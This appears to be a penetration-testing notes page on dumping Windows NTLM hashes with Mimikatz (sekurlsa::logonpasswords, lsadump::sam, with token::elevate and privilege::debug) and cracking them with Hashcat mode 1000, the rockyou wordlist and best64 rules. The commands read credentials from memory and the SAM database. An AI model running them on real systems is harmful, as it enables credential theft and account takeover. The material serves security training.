Crack NTLM Hashes

Dumping NTLM hashes with Mimikatz

Using the sekurlsa module, we can attempt to extract plaintext passwords and password hashes from all available sources using:

sekurlsa::logonpasswords

We can also extract all NTLM hashes from the SAM using

lsadump::sam

For this command, we must first enter

token::elevate

to elevate to SYSTEM user privileges and we will need to SeDebugPrivilege access right enable, which can be accomplished using:

privilege::debug

Cracking with Hashcat

Once we have the NTLM hash for a user, we can retrieve the correct hash mode from Hashcat's help output:

kali@kali:~/passwordattacks$ hashcat --help | grep -i "ntlm"   
                                                                            
   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocol
   5600 | NetNTLMv2                                           | Network Protocol
  27100 | NetNTLMv2 (NT)                                      | Network Protocol
   1000 | NTLM

We now have everything needed to start cracking the hash. The next step is to choose a wordlist and a rule file. For example, we will use the rockyou.txt wordlist with the best64.rule rule file which contains 64 effective rules.

kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

PreviousFile Transferring NextSQL Injection

Last updated 1 year ago